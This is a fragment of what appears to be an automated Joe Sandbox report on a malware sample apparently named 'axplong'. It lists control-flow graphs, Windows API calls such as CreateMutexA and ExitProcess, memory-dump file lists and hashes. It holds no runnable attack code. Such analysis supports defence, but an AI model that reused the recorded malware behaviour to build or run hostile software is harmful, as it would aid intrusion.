12815->12816 12818 63cda2 12816->12818 12817 648150 RtlAllocateHeap 12817->12820 12819 635b20 4 API calls 12818->12819 12821 63cdad 12819->12821 12820->12809 12820->12810 12820->12811 12820->12812 12820->12814 12820->12817 12823 648e70 RtlAllocateHeap 12820->12823 12822 63c990 4 API calls 12821->12822 12823->12820

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 358 66645b-666468 call 66a1c2 361 66648a-66649c call 66649d ExitProcess 358->361 362 66646a-666478 GetPEB 358->362 362->361 363 66647a-666489 362->363 363->361
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ExitProcess.KERNEL32(?,?,0066645A,?,?,?,?,?,006674AE), ref: 00666497
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                                                        • Opcode ID: a267273d2f40b9513487cd9372fc11241e9dc35585ce944f0938d1f7aa4c0463
                                                                                                                                                                                                        • Instruction ID: ccbe99c0c196711dba891417edce332289dd10af0576606f44e5f50de2cd62ec
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a267273d2f40b9513487cd9372fc11241e9dc35585ce944f0938d1f7aa4c0463
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2E04630140A08AFCA257B54E9299883B9BEF92344F108818F80856372CA69EC81C981

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 0063A893
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: $2i
                                                                                                                                                                                                        • API String ID: 1464230837-421247651
                                                                                                                                                                                                        • Opcode ID: b462b75808868396b20aef17be193eb2a83279f7327410201b2bfdf8e2da8397
                                                                                                                                                                                                        • Instruction ID: 9c76f1bff1e89024a77de16109d42eb56c8aee3a5825c5b994d82e7c260697d1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b462b75808868396b20aef17be193eb2a83279f7327410201b2bfdf8e2da8397
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59312871B041048BEF0CDB68EC8876EB777EFC6310F204658E0519B7D5C77599818BA1

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 22 639e74-639e94 26 639ec2-639ede 22->26 27 639e96-639ea2 22->27 30 639ee0-639eec 26->30 31 639f0c-639f2b 26->31 28 639ea4-639eb2 27->28 29 639eb8-639ebf call 64d593 27->29 28->29 34 63a85b 28->34 29->26 36 639f02-639f09 call 64d593 30->36 37 639eee-639efc 30->37 32 639f59-63a846 call 647f30 31->32 33 639f2d-639f39 31->33 38 639f3b-639f49 33->38 39 639f4f-639f56 call 64d593 33->39 41 63a883-63a8c4 Sleep CreateMutexA 34->41 42 63a85b call 666b9a 34->42 36->31 37->34 37->36 38->34 38->39 39->32 52 63a8d7-63a8d8 41->52 53 63a8c6-63a8c8 41->53 42->41 53->52 54 63a8ca-63a8d5 53->54 54->52
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 0063A893
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: $2i
                                                                                                                                                                                                        • API String ID: 1464230837-421247651
                                                                                                                                                                                                        • Opcode ID: 91f46cb7d2b2d108119ceaacca18e5f5cf4874f6fea1c7d035f43614937ad3e2
                                                                                                                                                                                                        • Instruction ID: 359a7a2510adb5c3253fd85bc2b79e68a9e48e282e6ed4fd6128622c99f9a84b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91f46cb7d2b2d108119ceaacca18e5f5cf4874f6fea1c7d035f43614937ad3e2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43312571B042008BEF1CDBA8DC887ADB767AFC6310F20465CE454AB7E5D77589818BA1

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 56 639fa9-639fc9 60 639ff7-63a013 56->60 61 639fcb-639fd7 56->61 62 63a041-63a060 60->62 63 63a015-63a021 60->63 64 639fd9-639fe7 61->64 65 639fed-639ff4 call 64d593 61->65 70 63a062-63a06e 62->70 71 63a08e-63a846 call 647f30 62->71 68 63a023-63a031 63->68 69 63a037-63a03e call 64d593 63->69 64->65 66 63a860 64->66 65->60 73 63a883-63a8c4 Sleep CreateMutexA 66->73 74 63a860 call 666b9a 66->74 68->66 68->69 69->62 77 63a070-63a07e 70->77 78 63a084-63a08b call 64d593 70->78 86 63a8d7-63a8d8 73->86 87 63a8c6-63a8c8 73->87 74->73 77->66 77->78 78->71 87->86 88 63a8ca-63a8d5 87->88 88->86
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 0063A893
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
